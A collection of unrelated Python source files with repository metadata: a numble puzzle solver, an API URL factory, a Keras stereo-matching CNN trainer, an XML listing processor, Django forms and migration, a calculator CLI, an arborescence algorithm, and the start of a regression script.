| 2023-07-10T15:20:57.479172
| 2023-06-25T19:06:33
| 2023-06-25T19:06:33
| 124,162,924
| 5
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,846
|
py
|
# numbo3b.py -- Manually "compiled" FARGish for brute-force numble solver
from operator import add, mul
from functools import reduce
from PortGraph import Node, Tag
from bases import ActiveNode
from Action import Action, FuncAction, Build, ActionSeq, SelfDestruct, Raise, \
Fail
from NodeSpec import NodeOfClass, NodeWithTag, NodeWithValue, HasSameValue, \
And, Not, CartesianProduct, TupAnd, NotLinkedToSame, no_dups
from LinkSpec import LinkSpec
from exc import FargDone
import expr
port_label_connections = {
# TODO
}
class Avail(Tag):
pass
class Consumed(Tag):
pass
class Failed(Tag):
pass
class Backtrack(Tag):
pass
class Done(Tag):
'''Indicates that an ActiveNode that has a single action to do has
done it.'''
pass
class Allowed(Tag):
'''Indicates an allowed Operator for solving the current numble.'''
pass
class Workspace(Node):
pass
class Number(Node):
def __init__(self, n):
self.value = n
class Target(Number):
pass
class Brick(Number):
pass
class Block(Number):
def fail(self, g, thisid):
for builder in g.neighbors(thisid, port_label='builder'):
g.datum(builder).fail(g, builder)
class Operator(Node):
pass
class Plus(Operator):
expr_class = expr.Plus # TODO How to put this in FARGish?
class Times(Operator):
expr_class = expr.Times # TODO How to put this in FARGish?
class Want(Tag, ActiveNode):
operands_scout_link = LinkSpec('agents', 'behalf_of')
backtracking_scout_link = LinkSpec('agents', 'behalf_of')
done_scout_link = LinkSpec('agents', 'behalf_of')
def actions(self, g, thisid):
targetid = g.taggee_of(thisid)
s1 = None
if not g.has_neighbor_at(
thisid, 'agents', neighbor_class=OperandsScout
):
s1 = Build(OperandsScout, [self.operands_scout_link], [thisid],
kwargs=dict(targetid=targetid))
s2 = None
# if not g.has_neighbor_at(
# thisid, 'agents', neighbor_class=BacktrackingScout
# ):
# s2 = Build(BacktrackingScout, [self.backtracking_scout_link], [thisid], kwargs=dict(targetid=targetid))
s3 = None
if not g.has_neighbor_at(
thisid, 'agents', neighbor_class=DoneScout
):
s3 = Build(DoneScout, [self.done_scout_link], [thisid],
kwargs=dict(targetid=targetid))
# s1 = Build.maybe_make(OperandsScout, behalf_of=thisid)
# s2 = Build.maybe_make(
# BacktrackingScout, behalf_of=thisid, targetid=targetid
# )
# s3 = Build.maybe_make(
# DoneScout, behalf_of=thisid, targetid=targetid
# )
return [s1, s2, s3]
class OperandsScout(ActiveNode):
# IDEA Break it down into more scouts: OperatorScout and OperandsScout.
# OperatorScout chooses an operator and then starts an OperandsScout
# weighted in a way that makes sense for the operator and target.
# An OperandsScout chooses operands and then chooses an operator,
# weighting probabilities to suit the operands.
# STILL BETTER Let OperatorScout and OperandsScout form coalitions.
# ANOTHER IDEA Multiple OperandsScouts, each looking at number nodes and
# deciding how or whether to combine them into a group of operands.
def __init__(self, targetid):
self.targetid = targetid
link_specs = [
LinkSpec('proposer', 'consume-operand'),
LinkSpec('proposer', 'consume-operand'),
LinkSpec('proposer', 'proposed-operator')
]
nodes_finder = CartesianProduct(
NodeWithTag(Number, Avail),
NodeWithTag(Number, Avail),
NodeWithTag(Operator, Allowed),
whole_tuple_criterion=TupAnd(
no_dups,
NotLinkedToSame(
*[link_spec.old_node_port_label for link_spec in link_specs]
)
)
)
def actions(self, g, thisid):
#TODO on-behalf-of ?
node_tup = self.nodes_finder.see_one(g)
print('NODE_TUP', node_tup)
if node_tup is not None:
return [Build(ConsumeOperands, self.link_specs, node_tup)]
# cos_in_progress = list(
# g.nodes_without_tag(Failed,
# nodes=g.nodes_without_tag(Done,
# nodes=g.nodes_of_class(ConsumeOperands))
# )
# )
cos_in_progress = [
co for co in g.nodes_of_class(ConsumeOperands)
if g.datum(co).can_go(g, co)
]
print('COS', cos_in_progress)
if cos_in_progress:
return []
# no operands to consume, so fail, i.e. trigger backtracking
nodeid = NodeWithTag(Block, Avail).see_one(g)
if g.value_of(nodeid) != g.value_of(self.targetid):
return [Fail(nodeid)]
def arith_result(g, operator_id):
operator_class = g.class_of(operator_id)
operand_ids = g.neighbors(operator_id, port_label='operands')
operand_values = [g.value_of(o) for o in operand_ids]
print('ARITH', operand_ids)
# TODO It would be much better if FARGish let you define these operations
# as class attributes.
if operator_class == Plus:
return reduce(add, operand_values, 0)
elif operator_class == Times:
return reduce(mul, operand_values, 1)
else:
raise ValueError(f'Unknown operator class {operator_class} of node {operator_id}.')
class ConsumeOperands(ActiveNode):
def actions(self, g, thisid):
if self.can_go(g, thisid):
return [self.MyAction(g, thisid)]
def can_go(self, g, thisid):
return (
not g.has_tag(thisid, Done)
and
g.all_have_tag(Avail, self.my_operands(g, thisid))
)
@classmethod
def my_operands(self, g, thisid):
return g.neighbors(thisid, port_label='consume-operand')
class MyAction(Action):
threshold = 0.0 # 1.0
#IDEA Let probability weight be support - threshold
def __init__(self, g, thisid):
self.thisid = thisid
def go(self, g):
op_class = g.class_of(
g.neighbor(self.thisid, port_label='proposed-operator')
)
operand_ids = g.neighbors(
self.thisid, port_label='consume-operand'
)
op_id = g.make_node(op_class, builder=self.thisid) #TODO container?
for operand_id in operand_ids:
g.add_edge(op_id, 'operands', operand_id, 'consumer')
result_id = g.make_node(
Block(arith_result(g, op_id)), builder=self.thisid
)
g.add_edge(result_id, 'source', op_id, 'consumer')
g.move_tag(Avail, operand_ids, result_id)
g.add_tag(Consumed, operand_ids)
g.add_tag(Done, self.thisid)
@classmethod
def fail(cls, g, thisid):
built_number_ids = g.neighbors(
thisid, port_label='built', neighbor_class=Number
)
operand_ids = g.neighbors(
thisid, port_label='consume-operand'
)
if g.all_have_tag(Avail, built_number_ids):
g.move_tag(Avail, built_number_ids, operand_ids)
g.remove_tag(operand_ids, Consumed)
g.add_tag(Failed, thisid)
for built_id in g.neighbors(thisid, port_label='built'):
g.add_tag(Failed, built_id)
class NumboSuccess(FargDone):
def __init__(self, expr):
self.expr = expr
def __str__(self):
return 'Success! ' + str(self.expr)
class DoneScout(ActiveNode):
def __init__(self, targetid):
self.targetid = targetid
def actions(self, g, thisid):
v = g.value_of(self.targetid)
#node_ids = NodeWithTag(Number, Avail).see_all(g)
#winner_id = next((g.value_of(id) == v for id in node_ids), None)
winner_id = \
NodeWithValue(v, nodeclass=Number, tagclass=Avail).see_one(g)
if winner_id is not None:
return [Raise(NumboSuccess,
expr.Equation(
extract_expr(g, winner_id),
extract_expr(g, self.targetid)))]
def extract_expr(g, nodeid):
'''Extracts an Expr tree consisting of nodeid and its sources.'''
nodeclass = g.class_of(nodeid)
if issubclass(nodeclass, Block):
return extract_expr(g, g.neighbor(nodeid, 'source'))
elif issubclass(nodeclass, Number):
return expr.Number(g.value_of(nodeid))
elif issubclass(nodeclass, Operator):
operand_exprs = (
extract_expr(g, n)
for n in g.neighbors(nodeid, ['source', 'operands'])
)
return g.datum(nodeid).expr_class(*operand_exprs)
else:
raise ValueError(f'extract_expr: node {nodeid} has unrecognized class {nodeclass}')
|
[
"bkovitz@indiana.edu"
] |
bkovitz@indiana.edu
|
61949f125838218983b65ad45b039efb2dac8f37
|
23ad12ba79d614e08a803d123ba9a7bf4fd08fef
|
/benchengine/api/route.py
|
b52fc40650e1def7151c2cae4572fdad45f3bf34
|
[
"MIT"
] |
permissive
|
scailfin/benchmark-engine
|
ab40026dd5b629ae8d855867abf4725ec9f69213
|
7ee5a841c1de873e8cafe2f10da4a23652395f29
|
refs/heads/master
| 2020-06-04T08:49:51.709979
| 2019-12-04T19:19:15
| 2019-12-04T19:19:15
| 191,950,765
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,489
|
py
|
# This file is part of the Reproducible Open Benchmarks for Data Analysis
# Platform (ROB).
#
# Copyright (C) 2019 NYU.
#
# ROB is free software; you can redistribute it and/or modify it under the
# terms of the MIT License; see LICENSE file for more details.
"""Factory for Urls to access and manipulate API resources."""
import benchengine.config as config
class UrlFactory(object):
"""The Url factory provides methods to generate API urls to access and
manipulate resources. For each API route there is a corresponding factory
method to generate the respective Url.
"""
def __init__(self, base_url=None):
"""Initialize the base Url for the service API. If the argument is not
given the value is expcted in the environment variable
'benchengine_API_BASEURL'.
Parameters
----------
base_url: string
Base Url for all API resources
"""
# Set base Url depending on whether it is given as argument or not
if base_url is None:
self.base_url = config.get_apiurl()
else:
self.base_url = base_url
# Remove trailing '/' from the base url
while self.base_url.endswith('/'):
self.base_url = self.base_url[:-1]
# Set base Url for resource related requests
self.benchmark_base_url = self.base_url + '/benchmarks'
self.team_base_url = self.base_url + '/teams'
self.user_base_url = self.base_url + '/user'
def add_team_members(self, team_id):
"""Url to POST list of new team members.
Parameters
----------
team_id: string
Unique team identifier
Returns
-------
string
"""
return self.get_team(team_id) + '/members'
def delete_file(self, team_id, file_id):
"""Url to DELETE a previously uploaded file.
Parameters
----------
team_id: string
Unique team identifier
file_id: string
Unique file identifier
Returns
-------
string
"""
return self.team_files(team_id) + '/' + file_id
def download_file(self, team_id, file_id):
"""Url to GET a previously uploaded file.
Parameters
----------
team_id: string
Unique team identifier
file_id: string
Unique file identifier
Returns
-------
string
"""
return self.team_files(team_id) + '/' + file_id + '/download'
def get_benchmark(self, benchmark_id):
"""Url to GET benchmark handle.
Parameters
----------
benchmark_id: string
Unique benchmark identifier
Returns
-------
string
"""
return self.benchmark_base_url + '/' + benchmark_id
def get_leaderboard(self, benchmark_id):
"""Url to GET benchmark leaderboard.
Parameters
----------
benchmark_id: string
Unique benchmark identifier
Returns
-------
string
"""
return self.get_benchmark(benchmark_id) + '/leaderboard'
def get_team(self, team_id):
"""Url to GET team handle.
Parameters
----------
team_id: string
Unique team identifier
Returns
-------
string
"""
return self.team_base_url + '/' + team_id
def list_benchmarks(self):
"""Url to GET a list of all benchmarks.
Returns
-------
string
"""
return self.benchmark_base_url
def list_teams(self):
"""Url to GET list of teams that a user is subscribed to and to POST a
create team request.
Returns
-------
string
"""
return self.team_base_url
def login(self):
"""Url to POST user credentials for login.
Returns
-------
string
"""
return self.user_base_url + '/login'
def logout(self):
"""Url to POST user logout request.
Returns
-------
string
"""
return self.user_base_url + '/logout'
def remove_team_member(self, team_id, user_id):
"""Url to DELETE a member for a team.
Parameters
----------
team_id: string
Unique team identifier
user_id: string
Unique user identifier
Returns
-------
string
"""
return self.add_team_members(team_id) + '/' + user_id
def service_descriptor(self):
"""Url to GET the service descriptor.
Returns
-------
string
"""
return self.base_url
def team_files(self, team_id):
"""Base Url to access uploaded files for a given team.
Parameters
----------
team_id: string
Unique team identifier
Returns
-------
string
"""
return self.get_team(team_id) + '/files'
def upload_file(self, team_id):
"""Url to POST a new file to upload. The uploaded file is associated
with the given team.
Parameters
----------
team_id: string
Unique team identifier
file_id: string
Unique file identifier
Returns
-------
string
"""
return self.team_files(team_id) + '/upload'
|
[
"heiko.muller@gmail.com"
] |
heiko.muller@gmail.com
|
bcb16c4b1d663c8ad8aa71fec1db6058abc08a41
|
cbce900c283ff249bca8a3d370822f1578f3e55e
|
/mc-cnn-rebuild.py
|
2e7fc63f1712946a65a498a37cdaf71c46d788eb
|
[] |
no_license
|
b03901165Shih/2018-CV-Final-Project
|
c53485794c53f0d40a42f9aa314ee9bad01638dc
|
c6a267f918cf76e8bf749bebb7071f817a307389
|
refs/heads/master
| 2020-06-22T17:22:27.241326
| 2019-07-19T16:26:18
| 2019-07-19T16:26:18
| 197,754,278
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,731
|
py
|
import numpy as np
import time
import os
#os.environ["CUDA_VISIBLE_DEVICES"]="0"
import h5py
import glob
import matplotlib.pyplot as plt
#np.random.seed(2019)
from keras.models import Sequential, Model
from keras.layers import Dense, Dropout, Activation, Flatten, Input, Concatenate
from keras.layers import Conv2D, MaxPooling2D
from keras import optimizers
from keras.layers.advanced_activations import ELU
from keras.utils import np_utils
from keras import backend as K
from PIL import Image
from keras.layers.normalization import BatchNormalization
from preprocess import getTrain
from keras.callbacks import ModelCheckpoint, EarlyStopping, ReduceLROnPlateau
from keras.preprocessing.image import ImageDataGenerator
SEED=2019
def augment_data( generator, X1, X2, y, batch_size = 32 ):
generator_seed = np.random.randint( SEED )
gen_X1 = generator.flow( X1, y,
batch_size = batch_size, seed = generator_seed )
gen_X2 = generator.flow( X2, y,
batch_size = batch_size, seed = generator_seed )
while True:
X1i = gen_X1.next()
X2i = gen_X2.next()
yield [ X1i[0], X2i[0] ], X1i[1]
def unison_shuffled_copies(a, b, c):
p = np.random.permutation(a.shape[0])
return a[p], b[p], c[p]
# Define the parameters for training
batch_size = 256
nb_classes = 2
nb_epoch = 120
# input image dimensions
img_rows, img_cols = 11, 11
# Volume of the training set
#sample_number = 10000#430608
nb_filters = 112
# CNN kernel size
kernel_size = (3,3)
# Here some additional preprocess methods like rotation etc. could be added.
input_shape = (img_rows, img_cols, 1)
for i in range(1):
#finetune = True
if(i==0):
finetune = True
tic = time.time()
(X1_train, X2_train, y_train) = getTrain()
toc = time.time()
print ("Time for loading the training set: ", toc-tic)
# Briefly check some patches. Positive-matching patches are expected to be of similar features. We store two left patches in X1_train. One for matching the positve right patch in X2_train. The other for matching negative right patch in X2_train.
X1_train = X1_train.astype('float32').reshape((X1_train.shape[0],img_rows, img_cols, 1))
X2_train = X2_train.astype('float32').reshape((X1_train.shape[0],img_rows, img_cols, 1))
X1_train, X2_train, y_train =unison_shuffled_copies(X1_train, X2_train, y_train)
valid_split = 0.9
train_size = (int)(valid_split*X1_train.shape[0])
X1_train_split = X1_train[:train_size]
X2_train_split = X2_train[:train_size]
y_train_split = y_train[:train_size]
X1_valid_split = X1_train[train_size:]
X2_valid_split = X2_train[train_size:]
y_valid_split = y_train[train_size:]
print('X1_valid_split.shape:',X1_valid_split.shape)
print('X2_valid_split.shape:',X2_valid_split.shape)
print('y_valid_split.shape :',y_valid_split.shape)
datagen = ImageDataGenerator(
rotation_range = 20,
#width_shift_range = 0.1,
#height_shift_range = 0.1,
shear_range = 0.1,
#zoom_range = [0.8,1],
#channel_shift_range= 0.1,
horizontal_flip = True,
vertical_flip = True
)
train_generator = augment_data( datagen, X1_train_split, X2_train_split, y_train_split, batch_size = batch_size )
'''
[X1b, X2b], y = next(train_generator)
print(X1b)
print(np.array(X1b).shape)
print(np.array(X2b).shape)
for k in range(len(X1b)):
plt.imshow(np.concatenate([X1_train_split[k,:,:,0],X2_train_split[k,:,:,0],X1b[k,:,:,0],X2b[k,:,:,0]],1)); plt.show()'''
# This neural network is working finely and ends up with a training accuracy of more than 90%.
#for i in range(3):
#y_train = np.expand_dims(y_train,axis=2)
print ('X1_train.shape',X1_train.shape)
print ('y_train.shape',y_train.shape)
'''
for i in range(sample_number>>1):
print(y_train[2*i],y_train[2*i+1])
plt.imshow(np.concatenate([X1_train[2*i], X2_train[2*i], X2_train[2*i+1]],1)); plt.show()
'''
left_inputs = Input(input_shape)
right_inputs = Input(input_shape)
Conv1 = Conv2D(nb_filters, kernel_size, padding='valid', activation='relu')
Conv2 = Conv2D(nb_filters, kernel_size, padding='valid', activation='relu')
Conv3 = Conv2D(nb_filters, kernel_size, padding='valid', activation='relu')
Conv4 = Conv2D(nb_filters, kernel_size, padding='valid', activation='relu')
sub_net = Conv2D(nb_filters, kernel_size, padding='valid', activation='relu')
left_branch = sub_net(Conv4(Conv3(Conv2(Conv1(left_inputs )))))
right_branch = sub_net(Conv4(Conv3(Conv2(Conv1(right_inputs)))))
merged = Concatenate(axis=-1)([left_branch, right_branch])
ft = Flatten()(merged)
dn1 = Dense(384, activation='relu')(ft)
dn2 = Dense(384, activation='relu')(dn1)
dn3 = Dense(384, activation='relu')(dn2)
output = Dense(1, activation='sigmoid')(dn3)
fc = Model([left_inputs,right_inputs],output)
fc.summary()
if(finetune):
fc.load_weights(filepath='my_mccnn_new4.h5')
#callbacks = [ModelCheckpoint(filepath='my_mccnn_new3.h5', verbose=1, save_best_only=True)]
callbacks = [
EarlyStopping(monitor='val_loss', patience=15, verbose=1, min_delta=1e-5),
ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=3, cooldown=0, verbose=1, min_lr=1e-8),
ModelCheckpoint(monitor='val_loss', filepath='my_mccnn_new4.h5', verbose=1, save_best_only=True, mode='auto')
]
optimizer = optimizers.adam(lr=2e-4, decay=1e-7)#optimizers.SGD(lr=1e-4, decay=1e-7, momentum=0.9, nesterov=True)#optimizers.adam(lr=8e-5, decay=1e-8)
fc.compile(optimizer=optimizer, loss='binary_crossentropy', metrics=['accuracy'])
fc.fit_generator( train_generator,
steps_per_epoch = len(X1_train_split)//batch_size,
epochs = nb_epoch,
callbacks = callbacks, verbose = 1,
validation_data = [[X1_valid_split, X2_valid_split], y_valid_split] )
#fc.fit([X1_train,X2_train], y_train, validation_split=0.1, batch_size=batch_size, epochs = nb_epoch, shuffle=True, callbacks = callbacks)
# Evaluate the result based on the training set
#score = fc.evaluate([X1_train,X2_train], y_train, verbose=0)
# print score.shape
#fc.save('my_mccnn_new4.h5')
#print('Test score: ', score[0])
#print('Test accuracy: ', score[1])
|
[
"b03901165@ntu.edu.tw"
] |
b03901165@ntu.edu.tw
|
3cc34c234ffb6b97cde45f5ddc3bb4a63f785718
|
48ab96560529c07069c66b47952b83461d0ef710
|
/processing.py
|
c0e465f801a7eee06d9937d672cf00cbffa38e99
|
[] |
no_license
|
mctrap/XMLParser_AdRoll
|
4f3960a3692c2f87f2b1ff1388e5d11089a95319
|
8a0bd1da6587e559271a552db0e90868596ad1bb
|
refs/heads/master
| 2020-03-29T04:11:11.799220
| 2018-09-19T23:49:28
| 2018-09-19T23:49:28
| 149,519,782
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,072
|
py
|
import xml.etree.ElementTree as ET
import os
def get_listing(filename_contents):
listing = ""
# remaining = ""
end_marker = "</listing>"
while True:
line = filename_contents.readline()
if end_marker in line:
listing += line[line.index(end_marker): len(end_marker)]
# remaining = line.replace(end_marker, "")
break
elif line == "":
break
else:
listing += line
return listing
def find_address_index(tree):
for i, child in enumerate(tree):
if child.tag == "address":
return i
return None
def add_city_element(listing, i):
try:
tree = ET.fromstring(listing)
# We are assumning address is on number 9
# and we are assuming city is in position 1
try:
assert tree[9][1].attrib['name'] == "city"
city = tree[9][1].text
except:
print("{} Order of tags is not correct".format(i))
city = ""
city_element = ET.Element("city")
city_element.text = city
tree.append(city_element)
return ET.tostring(tree)
except Exception as err:
import pdb; pdb.set_trace()
print err
return None
def process_file_contents(filename_contents, output_file, skip=0):
listing= get_listing(filename_contents)
remaining = "<listing>"
i = 0
while listing != "":
i += 1
if remaining not in listing:
listing = remaining + listing
new_listing = add_city_element(listing, i)
listing = get_listing(filename_contents)
if new_listing is None:
continue
if i < skip:
continue
with open(output_file, "a") as result_file:
result_file.write(new_listing)
if i % 100 == 0:
print "{} listings processed".format(i)
def rapid_count(filename_contents):
counter = 0
line = filename_contents.readline()
while line != "":
if "<listing>" in line:
counter += 1
line = filename_contents.readline()
if counter % 10000 == 0:
print "{} so far".format(counter)
print "{} total".format(counter)
if __name__=="__main__":
## CHANGE THIS VARIABLE
## then click run.sh
# filename = "AdrollFeed_9.17.xml"
path = "/Users/marktrapani/Documents/Feeds/Adroll"
input_folder = os.path.join(path, "input")
output_folder = os.path.join(path, "output")
all_files = [ f for f in os.listdir(input_folder) if ".xml" in f ]
files_to_process = []
for filename in all_files:
if os.path.exists(os.path.join(output_folder, filename)):
print("{} already processed".format(filename))
continue
files_to_process.append(filename)
if len(files_to_process) == 0:
print "Nothing to process"
for filename in files_to_process:
output_file = os.path.join(output_folder, filename)
filename_contents = open(os.path.join(input_folder, filename), "r")
# rapid_count(filename_contents)
# 237979
top_file = """<?xml version="1.0"?>
<listings>
<title>Apartment List feed</title>
<link rel="self" href="https://www.apartmentlist.com"/>
"""
end_file = "</listings>"
with open(output_file, "w") as result_file:
result_file.write(top_file)
process_file_contents(filename_contents, output_file)
with open(output_file, "a") as result_file:
result_file.write(end_file)
|
[
"mtrapani@apartmentlist.com"
] |
mtrapani@apartmentlist.com
|
21a8a55aa43fdbf262aa6277530f0e10cb1885b4
|
e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f
|
/indices/nnirrig.py
|
e0b5905774a6c4fac90f7e3c2509f538d136173e
|
[] |
no_license
|
psdh/WhatsintheVector
|
e8aabacc054a88b4cb25303548980af9a10c12a8
|
a24168d068d9c69dc7a0fd13f606c080ae82e2a6
|
refs/heads/master
| 2021-01-25T10:34:22.651619
| 2015-09-23T11:54:06
| 2015-09-23T11:54:06
| 42,749,205
| 2
| 3
| null | 2015-09-23T11:54:07
| 2015-09-18T22:06:38
|
Python
|
UTF-8
|
Python
| false
| false
| 517
|
py
|
ii = [('CookGHP3.py', 1), ('LyelCPG2.py', 3), ('SadlMLP.py', 1), ('AubePRP2.py', 1), ('LeakWTI2.py', 13), ('LeakWTI3.py', 9), ('PettTHE.py', 1), ('WilkJMC2.py', 19), ('RoscTTI3.py', 2), ('KiddJAE.py', 1), ('CoolWHM.py', 1), ('LandWPA.py', 1), ('LyelCPG.py', 1), ('GilmCRS.py', 3), ('DibdTRL2.py', 1), ('LeakWTI4.py', 11), ('LeakWTI.py', 4), ('MedwTAI2.py', 1), ('WilkJMC.py', 13), ('MackCNH.py', 2), ('FitzRNS4.py', 17), ('SadlMLP2.py', 1), ('BowrJMM3.py', 1), ('BeckWRE.py', 2), ('KirbWPW.py', 1), ('ClarGE4.py', 4)]
|
[
"varunwachaspati@gmail.com"
] |
varunwachaspati@gmail.com
|
b53ae90ac49a9f4d4a2d5858314cbe16235c915b
|
add102645cbe98956b51647608c9a9c25930f0ae
|
/punti_interesse/migrations/0008_auto_20190208_1148.py
|
3c6cbc14a36e918895a558fa587bc4a5b35b5c44
|
[] |
no_license
|
GianpaoloBranca/CAI-Punti-Interesse
|
2f8ef19975fa64108f1be98a1169c6eedc89499f
|
6543a83dfa260fae0a68e496493938c758080674
|
refs/heads/master
| 2020-04-15T17:42:21.144842
| 2019-05-27T10:13:09
| 2019-05-27T10:13:09
| 164,883,356
| 1
| 0
| null | 2019-03-07T15:37:42
| 2019-01-09T14:59:53
|
Python
|
UTF-8
|
Python
| false
| false
| 1,293
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.18 on 2019-02-08 10:48
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
import punti_interesse.validators
class Migration(migrations.Migration):
dependencies = [
('punti_interesse', '0007_auto_20190130_1752'),
]
operations = [
migrations.RenameField(
model_name='puntointeresse',
old_name='tipo',
new_name='sottocategoria',
),
migrations.AlterField(
model_name='puntointeresse',
name='latitudine',
field=models.DecimalField(decimal_places=6, max_digits=9, validators=[punti_interesse.validators.validate_degree], verbose_name='Latitudine'),
),
migrations.AlterField(
model_name='puntointeresse',
name='longitudine',
field=models.DecimalField(decimal_places=6, max_digits=9, validators=[punti_interesse.validators.validate_degree], verbose_name='Longitudine'),
),
migrations.AlterField(
model_name='validazionepunto',
name='quota',
field=models.IntegerField(validators=[django.core.validators.MinValueValidator(0)], verbose_name='Quota'),
),
]
|
[
"gianpaolo.branca@protonmail.com"
] |
gianpaolo.branca@protonmail.com
|
0e1aee4f477bca387c50733cad7219c7a0d59c31
|
035663d678908d7cc5b8390695c6713be6d57c35
|
/finance/forms.py
|
531c6194fa1bbe9b9c559af6bff3cbb5965add9e
|
[] |
no_license
|
DyadyaSasha/tehnoatom_homework5
|
b1e66f5099465acc72cebc9d05c17d1144e2fd7b
|
efe67566eeacc9e63a963bb06994181d47e45294
|
refs/heads/master
| 2021-01-12T10:01:36.865855
| 2016-12-13T08:05:33
| 2016-12-13T08:05:33
| 76,336,661
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,385
|
py
|
from django import forms
from datetime import date
import re
from .models import Acount, Charge
class AcountForm(forms.ModelForm):
class Meta:
model = Acount
fields = ('name', 'number')
def clean(self):
#CREDIT_CARD_VALID = r'^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\\d{3})\d{11})$'
number = self.cleaned_data.get('number')
#number = number.replace(' ', '').replace('-', '')
number = number.replace(' ', '')
#if not re.match(CREDIT_CARD_VALID, number):
if len(number) != 16:
self.add_error(
'number', "Card number you specified is not valid.")
self.cleaned_data['number'] = number
return self.cleaned_data
class ChargeForm(forms.ModelForm):
class Meta:
model = Charge
fields = ('transaction', 'dat')
def clean(self):
cleaned_data = super(ChargeForm, self).clean()
transaction = cleaned_data.get('transaction')
dat = cleaned_data.get('dat')
if transaction == 0 or transaction is None:
self.add_error('transaction', "Transaction can't equal zero")
if transaction < 0 and dat > date.today():
self.add_error('transaction', "Invalid transaction")
return cleaned_data
|
[
"serebryakovalexx@yandex.ru"
] |
serebryakovalexx@yandex.ru
|
4c7c193f8937cefe3b4f6663c2c920906a54d22f
|
2eba6fde704171c6fa2989eb3f32eaeb6fa190c0
|
/calculator.py
|
a3bed1eaa223ae4ada556252baec2ad618b541db
|
[] |
no_license
|
lauren-moore/calculator-1
|
54638ce603546595986219a8ce600ba671021aeb
|
5fba5d8b8ddeaaba9e3d66d447d28b45619b4037
|
refs/heads/main
| 2023-08-30T16:50:04.177911
| 2021-10-20T03:10:05
| 2021-10-20T03:10:05
| 417,974,689
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,862
|
py
|
"""CLI application for a prefix-notation calculator."""
from arithmetic import *
while True:
user_input = input("Enter your equation > ")
tokens = user_input.split(" ")
if "q" in tokens:
print("You will exit.")
break
elif len(tokens) < 2:
print("Not enough inputs.")
continue
operator = tokens[0]
num1 = tokens[1]
if len(tokens) < 3:
num2 = "0"
else:
num2 = tokens[2]
if len(tokens) > 3:
num3 = tokens[3]
# A place to store the return value of the math function we call,
# to give us one clear place where that result is printed.
result = None
if not num1.isdigit() or not num2.isdigit():
print("Those aren't numbers!")
continue
# We have to cast each value we pass to an arithmetic function from a
# a string into a numeric type. If we use float across the board, all
# results will have decimal points, so let's do that for consistency.
elif operator == "+":
result = add(float(num1), float(num2))
elif operator == "-":
result = subtract(float(num1), float(num2))
elif operator == "*":
result = multiply(float(num1), float(num2))
elif operator == "/":
result = divide(float(num1), float(num2))
elif operator == "square":
result = square(float(num1))
elif operator == "cube":
result = cube(float(num1))
elif operator == "pow":
result = power(float(num1), float(num2))
elif operator == "mod":
result = mod(float(num1), float(num2))
elif operator == "x+":
result = add_mult(float(num1), float(num2), float(num3))
elif operator == "cubes+":
result = add_cubes(float(num1), float(num2))
else:
result = "Please enter an operator followed by two integers."
print(result)
|
[
"laurencaroleen@gmail.com"
] |
laurencaroleen@gmail.com
|
3306e7504c4890b31bcf7842dfe2f7bfc38ef8ca
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2085/60587/313739.py
|
e7738c8f2800230aedac863942c2147cfac12720
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,774
|
py
|
class Edge:
def __init__(self, u, v, w):
self.u = u
self.v = v
self.w = w
def __str__(self):
return str(self.u) + str(self.v) + str(self.w)
def f(edges, n, m, root):
res = 0
while True:
pre = [-1] * n
visited = [-1] * n
inderee = [INF] * n
inderee[root] = 0
for i in range(m):
if edges[i].u != edges[i].v and edges[i].w < inderee[edges[i].v]:
pre[edges[i].v] = edges[i].u
inderee[edges[i].v] = edges[i].w
for i in range(n):
if i != root and inderee[i] == INF:
return -1
tn = 0
circle = [-1] * n
for i in range(n):
res += inderee[i]
v = i
while visited[v] != i and circle[v] == -1 and v != root:
visited[v] = i
v = pre[v]
if v != root and circle[v] == -1:
while circle[v] != tn:
circle[v] = tn
v = pre[v]
tn += 1
if tn == 0:
break
for i in range(n):
if circle[i] == -1:
circle[i] = tn
tn += 1
for i in range(m):
v = edges[i].v
edges[i].u = circle[edges[i].u]
edges[i].v = circle[edges[i].v]
if edges[i].u != edges[i].v:
edges[i].w -= inderee[v]
n = tn
root = circle[root]
return res
INF = 9999999999
if __name__ == '__main__':
n, m, root = list(map(int, input().split()))
edges = []
for i in range(m):
u, v, w = list(map(int, input().split()))
edges.append(Edge(u - 1, v - 1, w))
print(f(edges, n, m, root - 1), end="")
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
564aecf5ebe2b8468bd519fe9c9b4ded11d2c950
|
ca609a94fd8ab33cc6606b7b93f3b3ef201813fb
|
/2017-feb/16.regression algorithms/decision-trees2.py
|
a3a5fc45765aca71350c73642948a7e5c308cc9a
|
[] |
no_license
|
rajesh2win/datascience
|
fbc87def2a031f83ffceb4b8d7bbc31e8b2397b2
|
27aca9a6c6dcae3800fabdca4e3d76bd47d933e6
|
refs/heads/master
| 2021-01-20T21:06:12.488996
| 2017-08-01T04:39:07
| 2017-08-01T04:39:07
| 101,746,310
| 1
| 0
| null | 2017-08-29T09:53:49
| 2017-08-29T09:53:49
| null |
UTF-8
|
Python
| false
| false
| 1,421
|
py
|
import os
import pandas as pd
import pydot
from sklearn import tree
from sklearn import metrics
from sklearn import model_selection
import io
import math
#returns current working directory
os.getcwd()
#changes working directory
os.chdir("D:\\revenue-prediction")
restaurant_train = pd.read_csv("train.csv")
restaurant_train.shape
restaurant_train.info()
restaurant_train1 = pd.get_dummies(restaurant_train, columns=['City Group', 'Type'])
restaurant_train1.shape
